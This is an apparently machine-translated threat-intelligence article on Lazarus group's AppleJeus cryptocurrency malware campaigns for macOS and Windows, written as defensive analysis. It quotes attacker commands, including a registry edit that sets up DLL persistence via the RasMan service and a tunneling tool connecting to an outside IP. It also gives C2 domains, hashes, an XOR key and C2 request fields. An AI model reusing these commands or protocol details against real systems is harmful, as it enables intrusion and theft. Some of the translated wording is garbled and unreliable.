Shulou(Shulou.com)05/31 Report--

This article mainly analyzes the relevant knowledge points of how to carry out AppleJeus action analysis, the content is detailed and easy to understand, the operation details are reasonable, and has a certain reference value. If you are interested, you might as well follow the editor to have a look, and follow the editor to learn more about "how to conduct AppleJeus Action Analysis".

Lazarus is one of the most active APT organizations at present. In 2018, Kaspersky Needle discovered an attack called AppleJeus launched by the group. This action is Lazarus's first attack against macOS users. In order to attack macOS users, Lazarus developed macOS malware and added an authentication mechanism, which can download the payload of the later stage very carefully and load the payload of the next phase without dropping the disk. In order to attack Windows users, they developed a multi-stage infection program. After the release of AppleJeus Action Analysis, Lazarus became more cautious in conducting attacks and adopted more methods to avoid detection.

AppleJeus follow-up

After the release of AppleJeus Action Analysis, Lazarus continued to use similar modus operandi to disrupt the cryptocurrency business, and researchers found more malware similar to macOS malware in AppleJeus. The macOS malware uses common code to develop the installer. The malware uses QtBitcoinTrader developed by Centrabit.

The three macOS installers use similar post-installer scripts to populate the payload and use the same command when performing the acquired second-phase payload. In addition, another type of macOS malware, MarkMakingBot.dmg (be37637d8f6c1fbe7f3ffc702afdfe1d), was identified, which was created in 2019-03-12, but the network traffic is not encrypted, which is presumed to be the intermediate stage of macOS malware upgrade.

Changes in Windows malware

Continuous tracking of this activity revealed that a victim was attacked by Windows AppleJeus malware in March 2019. It is determined that the infection began with a malicious file named WFCUpdater.exe, and the attacker used a fake website: wfcwallet [.] Com .

The attacker used multi-stage infection as before, but the method changed. The infection begins with. Net malware, which is disguised as the WFC Wallet Update (a9e960948fdac81579d3b752e49aceda). After this. Net file executes, it checks whether the command line argument is "/ Embedding". The malware is responsible for decrypting WFC.cfg files in the same folder using a hard-coded 20-byte XOR key (82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62). Then connect to the C2 server:

Wfcwallet.com (resolved ip: 108.174.195.134)

Www.chainfun365.com (resolved ip: 23.254.217.53)

The attacker's command is then executed to install the next phase of the payload. The attacker places two files in the victim's system folder: rasext.dll and msctfp.dat. They use the RasMan (remote access connection Manager) Windows service to register the next phase of payload. After basic reconnaissance, the attacker manually populates the payload using the following command:

Cmd.exe / c dir rasext.dll

Cmd.exe / c dir msctfp.dat

Cmd.exe / c tasklist / svc | findstr RasMan

Cmd.exe / c reg add HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ services\ RasMan\ ThirdParty / v DllName / d rasext.dll / f

In order to establish a remote tunnel, the attacker implanted more related tools using command-line parameters, but the researchers did not get more tool files.

Port opener:

% APPDATA%\ Lenovo\ devicecenter\ Device.exe 6378

Tunneling tool:

% APPDATA%\ Lenovo\ devicecenter\ CenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443

MacOS malware changes JMTTrading

MacOS malware variants were found while tracking this attack activity. Attackers call their fake websites and applications JMTTrading, and other researchers and security vendors have also released a large number of technical details. I would like to emphasize the difference of this attack.

Attackers use GitHub to host their malicious applications.

Malware authors use Object-C instead of the QT framework in their macOS malware.

The malware implements a simple backdoor function in the macOS executable file.

Similar to previous cases, malware that is encrypted / decrypted using a 16-byte XOR key.

The Windows version of malware uses ADVobfuscator to hide its code.

The installation script for macOS malware is significantly different from previous versions.

UnionCryptoTrader

Another attack against macOS was also identified. The malicious program is called UnionCryptoTrader, and security researcher dineshdina04 found the same case, which is summarized as follows:

The installation script is the same as the script used by JMTTrading.

The malware author developed this macOS malware using SWIFT.

The malware author has changed the method of collecting information from.

The malware begins to authenticate using the auth_signature and auth_timestamp parameters to pass the second phase payload.

The malware does not need to drop the disk to load the next phase of the payload.

Windows version of UnionCryptoTrader

The researchers found the Windows version of UnionCryptoTrader (0f03ec3487578cef2398b5b732631fec). It is downloaded from Telegram Messenger and executed:

C:\ Users\ [user name]\ Downloads\ Telegram Desktop\ UnionCryptoTraderSetup.exe

In addition, the attacker's Telegram was found on the fake website, which can be highly confirmed that the attacker used Telegram Messenger to send the installer. Because the payload is executed only in memory, all related files cannot be obtained. The whole infection process is very similar to that of WFCWallet, but the injection process is increased.

The Windows version of UnionCryptoTrader has the following window, which displays price charts for several cryptocurrencies.

The Windows version of the UnionCryptoTrader update (629b9de3e4b84b4a0aa605a3e9471b31) is similar to the macOS version. Based on the build path (Z:\ Loader\ x64\ Release\ WinloaderExe.pdb), malware authors refer to this malware as a loader. When started, the malware retrieves the victim's basic information and sends it as HTTP POST.

If the C2 server responds to 200, the malware decrypts the payload and loads it into memory. Finally, the malware sends act=done. The next phase of the payload (e1953fa319cc11c2f003ad0542bca822) downloaded from this loader is similar to WFCWallet's .NET downloader. The malware is responsible for decrypting the Adobe.icx file in the same folder, injecting the next payload into the Internet Explorer process, and executing the attacker's commands.

The final payload (dd03c6eb62c9bf9adaf831f1d7adcbab) is the same as that of WFCWallet by manual implantation. Malware authors implant malware that is valid only on specific systems based on previously collected information. The malware examines the information of the infected system and compares it with a given value.

The Windows malware loads the encrypted msctfp.dat file into the system folder and loads each configuration. It executes additional commands based on the contents of the file. POST requests with predefined headers are used when malware communicates with a C2 server.

The initial communication malware first sends parameters:

Cgu: 64 bits hexadecimal value from the configuration

Aip: MD5 hash value in the configuration

Sv: hard-coded valu

If the response from the C2 server is 200, the malware sends the next POST request with encrypted data and random values, which the attacker uses to identify each victim and validate the POST request.

Imp: randomly generated valu

XOR value of dsh:imp

XOR value of hb_tp:imp (key:0x67BF32)

Hb_dl: encrypted data sent to C2 server

Ct: hard-coded valu

Finally, the malware downloads the next phase of the payload and decrypts it.

In addition, several fake websites that are still online were found during the investigation of its infrastructure.

Summary

During the AppleJeus follow-up, several victims were found in the UK, Poland, Russia and China, some of which were related to the cryptocurrency business.

The attacker changed the macOS and Windows malware, added an authentication mechanism to the macOS downloader, and changed the macOS development framework. The infection process in Windows system is different from that in the past. Attacks by Lazarus organizations for economic gain will continue.

This is the end of the introduction on "how to conduct AppleJeus Action Analysis". More related content can be searched for previous articles, hoping to help you answer questions and questions, please support the website!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.